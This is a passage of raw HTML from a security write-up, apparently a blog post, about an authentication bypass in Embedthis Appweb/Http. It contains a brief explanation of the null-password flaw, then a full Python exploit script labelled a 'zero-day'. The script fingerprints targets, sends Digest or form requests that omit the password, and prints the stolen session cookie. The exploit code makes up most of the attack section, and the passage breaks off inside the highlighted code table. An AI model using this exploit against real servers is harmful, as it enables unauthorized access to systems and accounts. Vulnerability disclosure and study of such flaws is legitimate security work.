class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-86\"><span class=\"crayon-cn\">2047<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-87\"><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-88\"><span class=\"crayon-cn\">2049<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;auth.login.authenticated&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;context&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;msg:&#8217;User authenticated&#8217;, username:&#8217;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-89\"><span class=\"crayon-cn\">2050<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-90\"><span class=\"crayon-cn\">2051<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">httpTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;auth.login.error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;error&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;msg:&#8217;Password failed to authenticate&#8217;, username:&#8217;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-91\"><span class=\"crayon-cn\">2052<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-92\"><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-93\"><span class=\"crayon-cn\">2054<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-94\"><span class=\"crayon-cn\">2055<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-95\"><span class=\"crayon-cn\">2056<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0125 seconds] -->  <\/p>\n<p>To be able to bypass the authentication we need to be able to pass a null password pointer, fortunately, both for form and digest authentication, the functions used to parse authentication details (line 1666) will allow us to set a null password pointer, and even with an error returned, in the end, it won\u2019t be checked by authCondition, allowing us to completely bypass authentication, the only condition to exploit this is to know a username in the hashmap.<\/p>\n<p>To overcome this limitation, it must be considered that the size of the hashmap is usually small, and the hash algorithm (FNV) used in the hashmap is weak: with a limited number of tries it could be possible to find a collision, and login without knowing a valid username (untested).<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5aa9a042c398b916061744\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  import requests  import argparse    print &#8220;&#8221;&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-  Embedthis Appweb\/Http Zero-Day Form\/Digest Authentication Bypass  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-  &#8220;&#8221;&#8221;    def test_digest(r):      auth = [&#8220;realm&#8221;, &#8220;domain&#8221;, &#8220;qop&#8221;, &#8220;nonce&#8221;, &#8220;opaque&#8221;, &#8220;algorithm&#8221;, &#8220;stale&#8221;, &#8220;MD5&#8221;, &#8220;FALSE&#8221;, &#8220;Digest&#8221;]      wwwauthenticate = r.headers.get(&#8216;WWW-Authenticate&#8217;)        if wwwauthenticate is None:          return False        for k in auth:          if k not in wwwauthenticate:              return False        return True      def test_form(r):      &#8220;&#8221;&#8221; extremely shoddy recognition, expect false positives &#8220;&#8221;&#8221;        auth = [(&#8220;X-XSS-Protection&#8221;, &#8220;1; mode=block&#8221;), (&#8220;X-Content-Type-Options&#8221;, &#8220;nosniff&#8221;), (&#8220;ETag&#8221;, None), (&#8220;Date&#8221;, None)]      potential_auth = [(&#8220;Last Modified&#8221;, &#8220;&#8221;), (&#8220;X-Frame-Options&#8221;, &#8220;SAMEORIGIN&#8221;), (&#8220;Accept-Ranges&#8221;, &#8220;bytes&#8221;), (&#8220;Content-Type&#8221;, &#8220;text\/html&#8221;)]        if r.headers.get(&#8220;WWW-Authenticate&#8221;) is not None:          return False        for k, v in auth:          rv = r.headers.get(k)          if not rv:              return False          if v is not None and v != rv:              return False        potential_count = 0      for k, v in potential_auth:          rv = r.headers.get(k)          if rv and v != &#8220;&#8221; and v == rv:              potential_count += 1        print &#8220;[+] Optional matchings: {}\/{}&#8221;.format(potential_count, len(potential_auth))      return True      def test(url):      &#8220;&#8221;&#8221; Newer EmbedThis HTTP Library\/Appweb versions do not advertise their presence in headers, sometimes might be proxied by nginx\/apache, we can only look for a default headers configuration &#8220;&#8221;&#8221;        r = requests.get(url)        # EmbedThis GoAhead uses a similar headers configuration, let&#8217;s skip it explicitly      serv = r.headers.get(&#8220;Server&#8221;)      if serv and &#8220;GoAhead&#8221; in serv:          return False        if test_digest(r):          return &#8220;digest&#8221;      elif test_form(r):          return &#8220;form&#8221;      return None      def exploit(url, username=&#8221;joshua&#8221;, authtype=&#8221;digest&#8221;):      payload = { &#8220;username&#8221;: username }        headers = {          &#8220;authorization&#8221;: &#8220;Digest username={}&#8221;.format(username),          &#8220;user-agent&#8221;: &#8220;TruelBot&#8221;,          &#8220;content-type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;,      }        if authtype == &#8220;digest&#8221;:          r = requests.get(url, data=payload, headers=headers)      else:          r = requests.post(url, data=payload, headers=headers)  \t\t  \tprint(r.content)  \t      if r.status_code != 200 or len(r.cookies) &lt; 1:          print &#8220;[!] Exploit failed, HTTP status code {}&#8221;.format(r.status_code)          return        print &#8220;[*] Succesfully exploited, here&#8217;s your c00kie:n  {}&#8221;.format(dict(r.cookies))      if __name__ == &#8220;__main__&#8221;:      parser = argparse.ArgumentParser(description=&#8221;Test&amp;Exploit EmbedThis form\/digest authentication bypass (CVE-XXXX-YYYY)&#8221;)      parser.add_argument(&#8216;-t&#8217;, &#8216;&#8211;target&#8217;, required=True, help=&#8221;specify the target url (i.e., http(s):\/\/target-url[:port]\/)&#8221;)      parser.add_argument(&#8216;-u&#8217;, &#8216;&#8211;user&#8217;, required=True, help=&#8221;you need to know a valid user name&#8221;)      parser.add_argument(&#8216;-c&#8217;, &#8216;&#8211;check&#8217;, action=&#8217;store_true&#8217;, default=False, help=&#8221;test for exploitability without running the actual exploit&#8221;)      parser.add_argument(&#8216;-f&#8217;, &#8216;&#8211;force&#8217;, action=&#8217;store_true&#8217;, default=False, help=&#8221;skip exploitability test&#8221;)      args = parser.parse_args()        url = args.target      username = args.user      t = &#8220;form&#8221; # default will try form\/post      if args.check or not args.force:          t = test(url)        if t is None:          print &#8220;[!] Target does not appear to be Appweb\/Embedthis HTTP with form\/post auth (force with -f)&#8221;      else:          print &#8220;[+] Potential appweb\/embedthis http, {} method&#8221;.format(t)        if not args.check:          print &#8220;[!] Exploiting {}, user {}!&#8221;.format(url, username)          exploit(url, username, t)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5aa9a042c398b916061744-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5aa9a042c398b916061744-111\">111<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">argparse<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-5\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-6\"><span class=\"crayon-s\">Embedthis Appweb\/Http Zero-Day Form\/Digest Authentication Bypass<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-7\"><span class=\"crayon-s\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-8\"><span class=\"crayon-s\">&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-10\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">test_digest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;realm&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;domain&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;qop&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nonce&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;opaque&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;algorithm&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;stale&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;MD5&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;FALSE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Digest&#8221;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">wwwauthenticate<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;WWW-Authenticate&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">wwwauthenticate <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">wwwauthenticate<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 